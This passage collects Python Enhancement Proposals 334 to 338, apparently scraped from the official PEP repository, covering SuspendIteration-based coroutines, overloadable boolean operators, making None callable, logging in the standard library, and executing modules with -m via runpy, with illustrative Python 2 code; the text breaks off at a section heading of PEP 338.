Asynchronous application frameworks such as Twisted [1] and Peak [2] are based on cooperative multitasking via event queues or deferred execution. While this approach to application development does not involve threads and thus avoids a whole class of problems [3], it creates a different sort of programming challenge. When an I/O operation would block, a user request must suspend so that other requests can proceed. The concept of a coroutine [4] promises to help the application developer grapple with this state management difficulty.

This PEP proposes a limited approach to coroutines based on an extension to the iterator protocol. Currently, an iterator may raise a StopIteration exception to indicate that it is done producing values. This proposal adds another exception to this protocol, SuspendIteration, which indicates that the given iterator may have more values to produce, but is unable to do so at this time.


Rationale

There are two current approaches to bringing co-routines to Python. Christian Tismer’s Stackless [6] involves a ground-up restructuring of Python’s execution model by hacking the ‘C’ stack. While this approach works, its operation is hard to describe and keep portable. A related approach is to compile Python code to Parrot [7], a register-based virtual machine, which has coroutines. Unfortunately, neither of these solutions is portable with IronPython (CLR) or Jython (JavaVM).

It is thought that a more limited approach, based on iterators, could provide a coroutine facility to application programmers and still be portable across runtimes.

  • Iterators keep their state in local variables that are not on the “C” stack. Iterators can be viewed as classes, with state stored in member variables that are persistent across calls to its next() method.
  • While an uncaught exception may terminate a function’s execution, an uncaught exception need not invalidate an iterator. The proposed exception, SuspendIteration, uses this feature. In other words, just because one call to next() results in an exception does not necessarily imply that the iterator itself is no longer capable of producing values.

There are four places where this new exception has an impact:

  • The PEP 255 simple generator mechanism could be extended to safely ‘catch’ this SuspendIteration exception, stuff away its current state, and pass the exception on to the caller.
  • Various iterator filters [9] in the standard library, such as itertools.izip, should be made aware of this exception so that they can transparently propagate SuspendIteration.
  • Iterators generated from I/O operations, such as a file or socket reader, could be modified to have a non-blocking variety. This option would raise a subclass of SuspendIteration if the requested operation would block.
  • The asyncore library could be updated to provide a basic ‘runner’ that pulls from an iterator; if the SuspendIteration exception is caught, then it moves on to the next iterator in its runlist [10] (see the sketch after this list). External frameworks like Twisted would provide alternative implementations, perhaps based on FreeBSD’s kqueue or Linux’s epoll.
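A minimal round-robin runner of the kind described in the asyncore item above might look like this. It is a sketch only: handle() is a hypothetical callback for delivering produced values, and SuspendIteration is the exception proposed by this PEP:

def run_all(iterators):
    # Cycle over the runlist; suspended iterators are retried on the
    # next pass, finished ones are dropped.
    runlist = [iter(it) for it in iterators]
    while runlist:
        still_running = []
        for it in runlist:
            try:
                handle(it.next())           # deliver the value produced
                still_running.append(it)
            except SuspendIteration:
                still_running.append(it)    # not done, just suspended
            except StopIteration:
                pass                        # this iterator is finished
        runlist = still_running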

While these may seem like dramatic changes, it is a very small amount of work compared with the utility provided by continuations.

Semantics

This section explains, at a high level, how the proposed SuspendIteration exception would behave.


Simple Iterators

The current functionality of iterators is best seen with a simple example which produces two values ‘one’ and ‘two’.

class States:

    def __iter__(self):
        self._next = self.state_one
        return self

    def next(self):
        return self._next()

    def state_one(self):
        self._next = self.state_two
        return "one"

    def state_two(self):
        self._next = self.state_stop
        return "two"

    def state_stop(self):
        raise StopIteration

print list(States())

An equivalent iteration could, of course, be created by the following generator:

def States():
    yield 'one'
    yield 'two'

print list(States())

Introducing SuspendIteration

Suppose that between producing ‘one’ and ‘two’, the generator above could block on a socket read. In this case, we would want to raise SuspendIteration to signal that the iterator is not done producing, but is unable to provide a value at the current moment.

from random import randint
from time import sleep

class SuspendIteration(Exception):
    pass

class NonBlockingResource:

    """Randomly unable to produce the second value"""

    def __iter__(self):
        self._next = self.state_one
        return self

    def next(self):
        return self._next()

    def state_one(self):
        self._next = self.state_suspend
        return "one"

    def state_suspend(self):
        rand = randint(1, 10)
        if 2 == rand:
            self._next = self.state_two
            return self.state_two()
        raise SuspendIteration()

    def state_two(self):
        self._next = self.state_stop
        return "two"

    def state_stop(self):
        raise StopIteration

def sleeplist(iterator, timeout=.1):
    """
    Do other things (e.g. sleep) while resource is
    unable to provide the next value
    """
    it = iter(iterator)
    retval = []
    while True:
        try:
            retval.append(it.next())
        except SuspendIteration:
            sleep(timeout)
            continue
        except StopIteration:
            break
    return retval

print sleeplist(NonBlockingResource())

In a real-world situation, the NonBlockingResource would be a file iterator, socket handle, or other I/O based producer. The sleeplist would instead be an async reactor, such as those found in asyncore or Twisted. The non-blocking resource could, of course, be written as a generator:

def NonBlockingResource():
    yield "one"
    while True:
        rand = randint(1, 10)
        if 2 == rand:
            break
        raise SuspendIteration()
    yield "two"

It is not necessary to add a keyword, ‘suspend’, since most real content generators will not be in application code; they will be in low-level I/O based operations. Since most programmers need not be exposed to the SuspendIteration() mechanism, a keyword is not needed.

Application Iterators

The previous example is rather contrived; a more ‘real-world’ example would be a web page generator which yields HTML content, and pulls from a database. Note that this is an example of neither the ‘producer’ nor the ‘consumer’, but rather of a filter.

def ListAlbums(cursor):
    cursor.execute("SELECT title, artist FROM album")
    yield '<html><body><table><tr><td>Title</td><td>Artist</td></tr>'
    for (title, artist) in cursor:
        yield '<tr><td>%s</td><td>%s</td></tr>' % (title, artist)
    yield '</table></body></html>'

The problem, of course, is that the database may block for some time before any rows are returned, and that during execution, rows may be returned in blocks of 10 or 100 at a time. Ideally, if the database blocks for the next set of rows, another user connection could be serviced. Note the complete absence of SuspendIteration in the above code. If done correctly, application developers would be able to focus on functionality rather than concurrency issues.

The iterator created by the above generator should do the magic necessary to maintain state, yet pass the exception through to a lower-level async framework. Here is an example of what the corresponding iterator would look like if coded up as a class:

class ListAlbums:

    def __init__(self, cursor):
        self.cursor = cursor

    def __iter__(self):
        self.cursor.execute("SELECT title, artist FROM album")
        self._iter = iter(self.cursor)
        self._next = self.state_head
        return self

    def next(self):
        return self._next()

    def state_head(self):
        self._next = self.state_cursor
        return "<html><body><table><tr><td>\
                Title</td><td>Artist</td></tr>"

    def state_tail(self):
        self._next = self.state_stop
        return "</table></body></html>"

    def state_cursor(self):
        try:
            (title, artist) = self._iter.next()
            return '<tr><td>%s</td><td>%s</td></tr>' % (title, artist)
        except StopIteration:
            self._next = self.state_tail
            return self.next()
        except SuspendIteration:
            # just pass-through
            raise

    def state_stop(self):
        raise StopIteration

Complicating Factors

While the above example is straightforward, things are a bit more complicated if the intermediate generator ‘condenses’ values, that is, it pulls in two or more values for each value it produces. For example,

def pair(iterLeft, iterRight):
    rhs = iter(iterRight)
    lhs = iter(iterLeft)
    while True:
        yield (rhs.next(), lhs.next())

In this case, the corresponding iterator behavior has to be a bit more subtle to handle the case of either the right or left iterator raising SuspendIteration. It seems to be a matter of decomposing the generator to recognize intermediate states where a SuspendIteration exception from the producing context could happen.

class pair:

    def __init__(self, iterLeft, iterRight):
        self.iterLeft = iterLeft
        self.iterRight = iterRight

    def __iter__(self):
        self.rhs = iter(self.iterRight)
        self.lhs = iter(self.iterLeft)
        self._temp_rhs = None
        self._temp_lhs = None
        self._next = self.state_rhs
        return self

    def next(self):
        return self._next()

    def state_rhs(self):
        self._temp_rhs = self.rhs.next()
        self._next = self.state_lhs
        return self.next()

    def state_lhs(self):
        self._temp_lhs = self.lhs.next()
        self._next = self.state_pair
        return self.next()

    def state_pair(self):
        self._next = self.state_rhs
        return (self._temp_rhs, self._temp_lhs)

This proposal assumes that a corresponding iterator written using this class-based method is possible for existing generators. The challenge seems to be the identification of distinct states within the generator where suspension could occur.

Resource Cleanup

The current generator mechanism has a strange interaction with exceptions, in that a ‘yield’ statement is not allowed within a try/finally block. The SuspendIteration exception raises a similar issue. The impacts of this issue are not clear. However, it may be that rewriting the generator into a state machine, as the previous section did, could resolve this issue, leaving the situation no worse than today and perhaps even removing the yield/finally restriction. More investigation is needed in this area.


API and Limitations

This proposal only covers ‘suspending’ a chain of iterators, and does not cover (of course) suspending general functions, methods, or “C” extension functions. While there could be no direct support for creating generators in “C” code, native “C” iterators which comply with the SuspendIteration semantics are certainly possible.


Low-Level Implementation

The author of the PEP is not yet familiar enough with the Python execution model to comment in this area.



Source: https://github.com/python/peps/blob/main/peps/pep-0334.rst



PEP 335 – Overloadable Boolean Operators

Author: Gregory Ewing <greg.ewing at canterbury.ac.nz>
Status: Rejected
Type: Standards Track
Created: 29-Aug-2004
Python-Version: 3.3
Post-History: 05-Sep-2004, 30-Sep-2011, 25-Oct-2011

Rejection Notice

This PEP was rejected. See https://mail.python.org/pipermail/python-dev/2012-March/117510.html


Abstract

This PEP proposes an extension to permit objects to define their own meanings for the boolean operators ‘and’, ‘or’ and ‘not’, and suggests an efficient strategy for implementation. A prototype of this implementation is available for download.


Background

Python does not currently provide any ‘__xxx__’ special methods corresponding to the ‘and’, ‘or’ and ‘not’ boolean operators. In the case of ‘and’ and ‘or’, the most likely reason is that these operators have short-circuiting semantics, i.e. the second operand is not evaluated if the result can be determined from the first operand. The usual technique of providing special methods for these operators therefore would not work.

There is no such difficulty in the case of ‘not’, however, and it would be straightforward to provide a special method for this operator. The rest of this proposal will therefore concentrate mainly on providing a way to overload ‘and’ and ‘or’.


Motivation

There are many applications in which it is natural to provide custom meanings for Python operators, and in some of these, having boolean operators excluded from those able to be customised can be inconvenient. Examples include:

  1. NumPy, in which almost all the operators are defined on arrays so as to perform the appropriate operation between corresponding elements, and return an array of the results. For consistency, one would expect a boolean operation between two arrays to return an array of booleans, but this is not currently possible.

     There is a precedent for an extension of this kind: comparison operators were originally restricted to returning boolean results, and rich comparisons were added so that comparisons of NumPy arrays could return arrays of booleans.

  2. A symbolic algebra system, in which a Python expression is evaluated in an environment which results in it constructing a tree of objects corresponding to the structure of the expression.

  3. A relational database interface, in which a Python expression is used to construct an SQL query.

A workaround often suggested is to use the bitwise operators ‘&’, ‘|’ and ‘~’ in place of ‘and’, ‘or’ and ‘not’, but this has some drawbacks:

  • The precedence of these is different in relation to the other operators, and they may already be in use for other purposes (as in example 1).
  • It is aesthetically displeasing to force users to use something other than the most obvious syntax for what they are trying to express. This would be particularly acute in the case of example 3, considering that boolean operations are a staple of SQL queries.
  • Bitwise operators do not provide a solution to the problem of chained comparisons such as ‘a < b < c’ which involve an implicit ‘and’ operation. Such expressions currently cannot be used at all on data types such as NumPy arrays where the result of a comparison cannot be treated as having normal boolean semantics; they must be expanded into something like (a < b) & (b < c), losing a considerable amount of clarity.

Rationale

The requirements for a successful solution to the problem of allowing boolean operators to be customised are:

  1. In the default case (where there is no customisation), the existing short-circuiting semantics must be preserved.
  2. There must not be any appreciable loss of speed in the default case.
  3. Ideally, the customisation mechanism should allow the object to provide either short-circuiting or non-short-circuiting semantics, at its discretion.

One obvious strategy, that has been previously suggested, is to pass into the special method the first argument and a function for evaluating the second argument. This would satisfy requirements 1 and 3, but not requirement 2, since it would incur the overhead of constructing a function object and possibly a Python function call on every boolean operation. Therefore, it will not be considered further here.

The following section proposes a strategy that addresses all three requirements. A prototype implementation of this strategy is available for download.


Specification


Special Methods


At the Python level, objects may define the following special methods.

Unary              Binary, phase 1      Binary, phase 2
-----              ---------------      ---------------
__not__(self)      __and1__(self)       __and2__(self, other)
                   __or1__(self)        __or2__(self, other)
                                        __rand2__(self, other)
                                        __ror2__(self, other)

The __not__ method, if defined, implements the ‘not’ operator. If it is not defined, or it returns NotImplemented, existing semantics are used.

To permit short-circuiting, processing of the ‘and’ and ‘or’ operators is split into two phases. Phase 1 occurs after evaluation of the first operand but before the second. If the first operand defines the relevant phase 1 method, it is called with the first operand as argument. If that method can determine the result without needing the second operand, it returns the result, and further processing is skipped.

If the phase 1 method determines that the second operand is needed, it returns the special value NeedOtherOperand. This triggers the evaluation of the second operand, and the calling of a relevant phase 2 method. During phase 2, the __and2__/__rand2__ and __or2__/__ror2__ method pairs work as for other binary operators.

Processing falls back to existing semantics if at any stage a relevant special method is not found or returns NotImplemented.

As a special case, if the first operand defines a phase 2 method but no corresponding phase 1 method, the second operand is always evaluated and the phase 2 method called. This allows an object which does not want short-circuiting semantics to simply implement the phase 2 methods and ignore phase 1.
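To make the two-phase protocol concrete, here is a rough Python model of how the interpreter might evaluate x and y under this proposal. This is a sketch only: the getattr-based dispatch is illustrative, the reflected __rand2__ path is omitted, and NotImplemented handling is elided for brevity:

NeedOtherOperand = object()   # stand-in for the proposed special value

def evaluate_and(x, y_thunk):
    # Phase 1: only the first operand has been evaluated so far.
    phase1 = getattr(type(x), '__and1__', None)
    if phase1 is not None:
        result = phase1(x)
        if result is not NeedOtherOperand:
            return result          # short-circuit: y is never evaluated
    y = y_thunk()                  # evaluate the second operand
    # Phase 2: ordinary binary dispatch on the first operand.
    phase2 = getattr(type(x), '__and2__', None)
    if phase2 is not None:
        return phase2(x, y)
    return x and y                 # fall back to existing semantics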


Bytecodes

The patch adds four new bytecodes, LOGICAL_AND_1, LOGICAL_AND_2, LOGICAL_OR_1 and LOGICAL_OR_2. As an example of their use, the bytecode generated for an ‘and’ expression looks like this:

     .
     .
     .
     evaluate first operand
     LOGICAL_AND_1  L
     evaluate second operand
     LOGICAL_AND_2
L:   .
     .
     .

The LOGICAL_AND_1 bytecode performs phase 1 processing. If it determines that the second operand is needed, it leaves the first operand on the stack and continues with the following code. Otherwise it pops the first operand, pushes the result and branches to L.

The LOGICAL_AND_2 bytecode performs phase 2 processing, popping both operands and pushing the result.

Type Slots

At the C level, the new special methods are manifested as five new slots in the type object. In the patch, they are added to the tp_as_number substructure, since this allows making use of some existing code for dealing with unary and binary operators. Their existence is signalled by a new type flag, Py_TPFLAGS_HAVE_BOOLEAN_OVERLOAD.


The new type slots are:

unaryfunc nb_logical_not;
unaryfunc nb_logical_and_1;
unaryfunc nb_logical_or_1;
binaryfunc nb_logical_and_2;
binaryfunc nb_logical_or_2;

Python/C API Functions

There are also five new Python/C API functions corresponding to the new operations:

PyObject *PyObject_LogicalNot(PyObject *);
PyObject *PyObject_LogicalAnd1(PyObject *);
PyObject *PyObject_LogicalOr1(PyObject *);
PyObject *PyObject_LogicalAnd2(PyObject *, PyObject *);
PyObject *PyObject_LogicalOr2(PyObject *, PyObject *);

Alternatives and Optimisations

This section discusses some possible variations on the proposal, and ways in which the bytecode sequences generated for boolean expressions could be optimised.


Reduced special method set

For completeness, the full version of this proposal includes a mechanism for types to define their own customised short-circuiting behaviour. However, the full mechanism is not needed to address the main use cases put forward here, and it would be possible to define a simplified version that only includes the phase 2 methods. There would then only be 5 new special methods (__and2__, __rand2__, __or2__, __ror2__, __not__) with 3 associated type slots and 3 API functions.

This simplified version could be expanded to the full version later if desired.


Additional bytecodes

As defined here, the bytecode sequence for code that branches on the result of a boolean expression would be slightly longer than it currently is. For example, in Python 2.7,

if a and b:
    statement1
else:
    statement2

generates

    LOAD_GLOBAL         a
    POP_JUMP_IF_FALSE   false_branch
    LOAD_GLOBAL         b
    POP_JUMP_IF_FALSE   false_branch
    <code for statement1>
    JUMP_FORWARD        end_branch
false_branch:
    <code for statement2>
end_branch:

Under this proposal as described so far, it would become something like

    LOAD_GLOBAL         a
    LOGICAL_AND_1       test
    LOAD_GLOBAL         b
    LOGICAL_AND_2
test:
    POP_JUMP_IF_FALSE   false_branch
    <code for statement1>
    JUMP_FORWARD        end_branch
false_branch:
    <code for statement2>
end_branch:

This involves executing one extra bytecode in the short-circuiting case and two extra bytecodes in the non-short-circuiting case.

However, by introducing extra bytecodes that combine the logical operations with testing and branching on the result, it can be reduced to the same number of bytecodes as the original:

    LOAD_GLOBAL         a
    AND1_JUMP           true_branch, false_branch
    LOAD_GLOBAL         b
    AND2_JUMP_IF_FALSE  false_branch
true_branch:
    <code for statement1>
    JUMP_FORWARD        end_branch
false_branch:
    <code for statement2>
end_branch:

Here, AND1_JUMP performs phase 1 processing as above, and then examines the result. If there is a result, it is popped from the stack, its truth value is tested and a branch taken to one of two locations.

Otherwise, the first operand is left on the stack and execution continues to the next bytecode. The AND2_JUMP_IF_FALSE bytecode performs phase 2 processing, pops the result and branches if it tests false.

For the ‘or’ operator, there would be corresponding OR1_JUMP and OR2_JUMP_IF_TRUE bytecodes.

If the simplified version without phase 1 methods is used, then early exiting can only occur if the first operand is false for ‘and’ and true for ‘or’. Consequently, the two-target AND1_JUMP and OR1_JUMP bytecodes can be replaced with AND1_JUMP_IF_FALSE and OR1_JUMP_IF_TRUE, these being ordinary branch instructions with only one target.

Optimisation of ‘not’

Recent versions of Python implement a simple optimisation in which branching on a negated boolean expression is implemented by reversing the sense of the branch, saving a UNARY_NOT opcode.

Taking a strict view, this optimisation should no longer be performed, because the ‘not’ operator may be overridden to produce quite different results from usual. However, in typical use cases, it is not envisaged that expressions involving customised boolean operations will be used for branching – it is much more likely that the result will be used in some other way.

Therefore, it would probably do little harm to specify that the compiler is allowed to use the laws of boolean algebra to simplify any expression that appears directly in a boolean context. If this is inconvenient, the result can always be assigned to a temporary name first.

This would allow the existing ‘not’ optimisation to remain, and would permit future extensions of it such as using De Morgan’s laws to extend it deeper into the expression.


Usage Examples


Example 1: NumPy Arrays

#-----------------------------------------------------------------
#
#   This example creates a subclass of numpy array to which
#   'and', 'or' and 'not' can be applied, producing an array
#   of booleans.
#
#-----------------------------------------------------------------

from numpy import array, ndarray

class BArray(ndarray):

    def __str__(self):
        return "barray(%s)" % ndarray.__str__(self)

    def __and2__(self, other):
        return (self & other)

    def __or2__(self, other):
        return (self | other)

    def __not__(self):
        return (self == 0)

def barray(*args, **kwds):
    return array(*args, **kwds).view(type = BArray)

a0 = barray([0, 1, 2, 4])
a1 = barray([1, 2, 3, 4])
a2 = barray([5, 6, 3, 4])
a3 = barray([5, 1, 2, 4])

print "a0:", a0
print "a1:", a1
print "a2:", a2
print "a3:", a3
print "not a0:", not a0
print "a0 == a1 and a2 == a3:", a0 == a1 and a2 == a3
print "a0 == a1 or a2 == a3:", a0 == a1 or a2 == a3

Example 1 Output

a0: barray([0 1 2 4])
a1: barray([1 2 3 4])
a2: barray([5 6 3 4])
a3: barray([5 1 2 4])
not a0: barray([ True False False False])
a0 == a1 and a2 == a3: barray([False False False  True])
a0 == a1 or a2 == a3: barray([ True False False  True])

Example 2: Database Queries

#-----------------------------------------------------------------
#
#   This example demonstrates the creation of a DSL for database
#   queries allowing 'and' and 'or' operators to be used to
#   formulate the query.
#
#-----------------------------------------------------------------

class SQLNode(object):

    def __and2__(self, other):
        return SQLBinop("and", self, other)

    def __rand2__(self, other):
        return SQLBinop("and", other, self)

    def __eq__(self, other):
        return SQLBinop("=", self, other)


class Table(SQLNode):

    def __init__(self, name):
        self.__tablename__ = name

    def __getattr__(self, name):
        return SQLAttr(self, name)

    def __sql__(self):
        return self.__tablename__


class SQLBinop(SQLNode):

    def __init__(self, op, opnd1, opnd2):
        self.op = op.upper()
        self.opnd1 = opnd1
        self.opnd2 = opnd2

    def __sql__(self):
        return "(%s %s %s)" % (sql(self.opnd1), self.op, sql(self.opnd2))


class SQLAttr(SQLNode):

    def __init__(self, table, name):
        self.table = table
        self.name = name

    def __sql__(self):
        return "%s.%s" % (sql(self.table), self.name)


class SQLSelect(SQLNode):

    def __init__(self, targets):
        self.targets = targets
        self.where_clause = None

    def where(self, expr):
        self.where_clause = expr
        return self

    def __sql__(self):
        result = "SELECT %s" % ", ".join([sql(target) for target in self.targets])
        if self.where_clause:
            result = "%s WHERE %s" % (result, sql(self.where_clause))
        return result


def sql(expr):
    if isinstance(expr, SQLNode):
        return expr.__sql__()
    elif isinstance(expr, str):
        return "'%s'" % expr.replace("'", "''")
    else:
        return str(expr)


def select(*targets):
    return SQLSelect(targets)

#-----------------------------------------------------------------

dishes = Table("dishes")
customers = Table("customers")
orders = Table("orders")

query = select(customers.name, dishes.price, orders.amount).where(
    customers.cust_id == orders.cust_id and orders.dish_id == dishes.dish_id
    and dishes.name == "Spam, Eggs, Sausages and Spam")

print repr(query)
print sql(query)

Example 2 Output

<__main__.SQLSelect object at 0x1cc830>
SELECT customers.name, dishes.price, orders.amount WHERE
(((customers.cust_id = orders.cust_id) AND (orders.dish_id =
dishes.dish_id)) AND (dishes.name = 'Spam, Eggs, Sausages and Spam'))

Source: https://github.com/python/peps/blob/main/peps/pep-0335.rst



PEP 336 – Make None Callable

Author: Andrew McClelland <eternalsquire at comcast.net>
Status: Rejected
Type: Standards Track
Created: 28-Oct-2004
Post-History:

Abstract

None should be a callable object that when called with any arguments has no side effect and returns None.


BDFL Pronouncement

This PEP is rejected. It is considered a feature that None raises an error when called. The proposal falls short in tests for obviousness, clarity, explicitness, and necessity. The provided Switch example is nice but easily handled by a simple lambda definition. See python-dev discussion on 17 June 2005 [1].


Motivation

To allow a programming style for selectable actions that is more in accordance with the minimalistic functional programming goals of the Python language.


Rationale

Allow the use of None in method tables as a universal no effect rather than either (1) checking a method table entry against None before calling, or (2) writing a local no effect method with arguments similar to other functions in the table.


The semantics would be effectively:

class None:

    def __call__(self, *args):
        pass

How To Use


Before, checking function table entry against None:

class Select:

    def a(self, input):
        print 'a'

    def b(self, input):
        print 'b'

    def c(self, input):
        print 'c'

    def __call__(self, input):
        function = { 1 : self.a,
                     2 : self.b,
                     3 : self.c
                   }.get(input, None)
        if function:
            return function(input)

Before, using a local no effect method:

class Select:

    def a(self, input):
        print 'a'

    def b(self, input):
        print 'b'

    def c(self, input):
        print 'c'

    def nop(self, input):
        pass

    def __call__(self, input):
        return { 1 : self.a,
                 2 : self.b,
                 3 : self.c
               }.get(input, self.nop)(input)

After:

class Select:

    def a(self, input):
        print 'a'

    def b(self, input):
        print 'b'

    def c(self, input):
        print 'c'

    def __call__(self, input):
        return { 1 : self.a,
                 2 : self.b,
                 3 : self.c
               }.get(input, None)(input)


Source: https://github.com/python/peps/blob/main/peps/pep-0336.rst


PEP 337 – Logging Usage in the Standard Library

Author: Michael P. Dubner <dubnerm at mindless.com>
Status: Deferred
Type: Standards Track
Created: 02-Oct-2004
Python-Version: 2.5
Post-History: 10-Nov-2004

Abstract

This PEP defines a standard for using the logging system (PEP 282) in the standard library.

Implementing this PEP will simplify development of daemon applications. As a downside, this PEP requires slight modifications (however, in a back-portable way) to a large number of standard modules.

After implementing this PEP, one can use the following filtering scheme:

logging.getLogger('py.BaseHTTPServer').setLevel(logging.FATAL)
+

PEP Deferral

+

Further exploration of the concepts covered in this PEP has been deferred for lack of a current champion interested in promoting the goals of the PEP and collecting and incorporating feedback, and with sufficient available time to do so effectively.


Rationale

There are a couple of situations when output to stdout or stderr is impractical:

  • Daemon applications where the framework doesn’t allow the redirection of standard output to some file, but assumes use of some other form of logging. Examples are syslog under *nixes and EventLog under WinNT+.
  • GUI applications which want to output every new log entry in a separate pop-up window (i.e. fading OSD).

Also, applications sometimes want to filter output entries based on their source or severity. This requirement can’t be implemented using simple redirection.

Finally, output sometimes needs to be marked with event timestamps, which can be accomplished with ease using the logging system.

Proposal

Every module usable for daemon and GUI applications should be rewritten to use the logging system instead of print or sys.stdout.write.

There should be code like this included at the beginning of every modified module:

import logging

_log = logging.getLogger('py.<module-name>')

A prefix of py. [2] must be used by all modules included in the standard library distributed along with Python, and only by such modules (unverifiable). The use of _log is intentional as we don’t want to auto-export it. For modules that use log only in one class a logger can be created inside the class definition as follows:

class XXX:

    __log = logging.getLogger('py.<module-name>')

Then this class can create access methods to log to this private logger.

So print and sys.std{out|err}.write statements should be replaced with _log.{debug|info}, and traceback.print_exception with _log.exception or sometimes _log.debug('...', exc_info=1).
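For instance, a module doing direct stream output might change as follows (a sketch; the message and variable names are illustrative only):

# before
print >> sys.stderr, 'connection to %s failed' % host

# after
_log.info('connection to %s failed', host)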


Module List

Here is a (possibly incomplete) list of modules to be reworked:

  • asyncore (dispatcher.log, dispatcher.log_info)
  • BaseHTTPServer (BaseHTTPRequestHandler.log_request, BaseHTTPRequestHandler.log_error, BaseHTTPRequestHandler.log_message)
  • cgi (possibly - is cgi.log used by somebody?)
  • ftplib (if FTP.debugging)
  • gopherlib (get_directory)
  • httplib (HTTPResponse, HTTPConnection)
  • ihooks (_Verbose)
  • imaplib (IMAP4._mesg)
  • mhlib (MH.error)
  • nntplib (NNTP)
  • pipes (Template.makepipeline)
  • pkgutil (extend_path)
  • platform (_syscmd_ver)
  • poplib (if POP3._debugging)
  • profile (if Profile.verbose)
  • robotparser (_debug)
  • sgmllib (if SGMLParser.verbose)
  • shlex (if shlex.debug)
  • smtpd (SMTPChannel/PureProxy where print >> DEBUGSTREAM)
  • smtplib (if SMTP.debuglevel)
  • SocketServer (BaseServer.handle_error)
  • telnetlib (if Telnet.debuglevel)
  • threading? (_Verbose._note, Thread.__bootstrap)
  • timeit (Timer.print_exc)
  • trace
  • uu (decode)

Additionally there are a couple of modules with commented debug output or modules where debug output should be added. For example:

  • urllib

Finally, some modules should possibly be extended to provide more debug information.

Doubtful Modules

Listed here are modules that the community will propose for addition to the module list, and modules that the community says should be removed from it.

  • tabnanny (check)

Guidelines for Logging Usage

Also, we can provide some recommendations to authors of library modules so they all follow the same format for naming loggers. I propose that non-standard-library modules should use loggers named after their full names, so a module “spam” in sub-package “junk” of package “dummy” will be named “dummy.junk.spam” and, of course, the __init__ module of the same sub-package will have the logger name “dummy.junk”.
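A minimal illustration of that naming guideline, using the hypothetical package layout from the text:

# in dummy/junk/spam.py
import logging
_log = logging.getLogger('dummy.junk.spam')

# in dummy/junk/__init__.py
_log = logging.getLogger('dummy.junk')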



Source: https://github.com/python/peps/blob/main/peps/pep-0337.rst



PEP 338 – Executing modules as scripts

Author: Alyssa Coghlan <ncoghlan at gmail.com>
Status: Final
Type: Standards Track
Created: 16-Oct-2004
Python-Version: 2.5
Post-History: 08-Nov-2004, 11-Feb-2006, 12-Feb-2006, 18-Feb-2006

Abstract

This PEP defines semantics for executing any Python module as a script, either with the -m command line switch, or by invoking it via runpy.run_module(modulename).

The -m switch implemented in Python 2.4 is quite limited. This PEP proposes making use of the PEP 302 import hooks to allow any module which provides access to its code object to be executed.


Rationale

Python 2.4 adds the command line switch -m to allow modules to be located using the Python module namespace for execution as scripts. The motivating examples were standard library modules such as pdb and profile, and the Python 2.4 implementation is fine for this limited purpose.

A number of users and developers have requested extension of the feature to also support running modules located inside packages. One example provided is pychecker’s pychecker.checker module. This capability was left out of the Python 2.4 implementation because the implementation of this was significantly more complicated, and the most appropriate strategy was not at all clear.

The opinion on python-dev was that it was better to postpone the extension to Python 2.5, and go through the PEP process to help make sure we got it right.

Since that time, it has also been pointed out that the current version of -m does not support zipimport or any other kind of alternative import behaviour (such as frozen modules).

Providing this functionality as a Python module is significantly easier than writing it in C, and makes the functionality readily available to all Python programs, rather than being specific to the CPython interpreter. CPython’s command line switch can then be rewritten to make use of the new module.

Scripts which execute other scripts (e.g. profile, pdb) also have the option to use the new module to provide -m style support for identifying the script to be executed.


Scope of this proposal

In Python 2.4, a module located using -m is executed just as if its filename had been provided on the command line. The goal of this PEP is to get as close as possible to making that statement also hold true for modules inside packages, or accessed via alternative import mechanisms (such as zipimport).

Prior discussions suggest it should be noted that this PEP is not about changing the idiom for making Python modules also useful as scripts (see PEP 299). That issue is considered orthogonal to the specific feature addressed by this PEP.


Current Behaviour

Before describing the new semantics, it’s worth covering the existing semantics for Python 2.4 (as they are currently defined only by the source code and the command line help).

When -m is used on the command line, it immediately terminates the option list (like -c). The argument is interpreted as the name of a top-level Python module (i.e. one which can be found on sys.path).

If the module is found, and is of type PY_SOURCE or PY_COMPILED, then the command line is effectively reinterpreted from python <options> -m <module> <args> to python <options> <filename> <args>. This includes setting sys.argv[0] correctly (some scripts rely on this - Python’s own regrtest.py is one example).
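For example (the installation path shown is hypothetical):

python -m pdb myscript.py
# is effectively reinterpreted as something like
python /usr/lib/python2.4/pdb.py myscript.py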

If the module is not found, or is not of the correct type, an error is printed.


Proposed Semantics

The semantics proposed are fairly simple: if -m is used to execute a module the PEP 302 import mechanisms are used to locate the module and retrieve its compiled code, before executing the module in accordance with the semantics for a top-level module. The interpreter does this by invoking a new standard library function runpy.run_module.

This is necessary due to the way Python’s import machinery locates modules inside packages. A package may modify its own __path__ variable during initialisation. In addition, paths may be affected by *.pth files, and some packages will install custom loaders on sys.meta_path. Accordingly, the only way for Python to reliably locate the module is by importing the containing package and using the PEP 302 import hooks to gain access to the Python code.

Note that the process of locating the module to be executed may require importing the containing package. The effects of such a package import that will be visible to the executed module are:

  • the containing package will be in sys.modules
  • any external effects of the package initialisation (e.g. installed import hooks, loggers, atexit handlers, etc.)

Reference Implementation

A reference implementation is available on SourceForge ([2]), along with documentation for the library reference ([5]). There are two parts to this implementation. The first is a proposed standard library module runpy. The second is a modification to the code implementing the -m switch to always delegate to runpy.run_module instead of trying to run the module directly. The delegation has the form:

runpy.run_module(sys.argv[0], run_name="__main__", alter_sys=True)

run_module is the only function runpy exposes in its public API.

run_module(mod_name[, init_globals][, run_name][, alter_sys])

Execute the code of the specified module and return the resulting module globals dictionary. The module’s code is first located using the standard import mechanism (refer to PEP 302 for details) and then executed in a fresh module namespace.

The optional dictionary argument init_globals may be used to pre-populate the globals dictionary before the code is executed. The supplied dictionary will not be modified. If any of the special global variables below are defined in the supplied dictionary, those definitions are overridden by the run_module function.

The special global variables __name__, __file__, __loader__ and __builtins__ are set in the globals dictionary before the module code is executed.

__name__ is set to run_name if this optional argument is supplied, and the original mod_name argument otherwise.

__loader__ is set to the PEP 302 module loader used to retrieve the code for the module (this loader may be a wrapper around the standard import mechanism).

__file__ is set to the name provided by the module loader. If the loader does not make filename information available, this argument is set to None.

__builtins__ is automatically initialised with a reference to the top level namespace of the __builtin__ module.

If the argument alter_sys is supplied and evaluates to True, then sys.argv[0] is updated with the value of __file__ and sys.modules[__name__] is updated with a temporary module object for the module being executed. Both sys.argv[0] and sys.modules[__name__] are restored to their original values before this function returns.

When invoked as a script, the runpy module finds and executes the +module supplied as the first argument. It adjusts sys.argv by +deleting sys.argv[0] (which refers to the runpy module itself) +and then invokes run_module(sys.argv[0], run_name="__main__", +alter_sys=True).

+
+
+

Import Statements and the Main Module

+

